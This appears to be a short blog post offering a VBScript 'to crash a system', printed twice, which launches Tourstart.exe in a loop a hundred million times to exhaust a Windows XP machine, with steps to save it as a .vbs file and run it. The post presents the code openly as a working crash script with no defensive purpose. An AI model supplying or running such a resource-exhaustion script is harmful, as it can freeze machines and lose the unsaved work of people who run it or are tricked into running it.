Option ExplicitSave It As Anything.vbs in Notepad
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
It Only Works With Windows XP

Option ExplicitSave It As Anything.vbs in Notepad
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
Responses
0 Respones to "[.vbs] Script To Crash A System!"
Post a Comment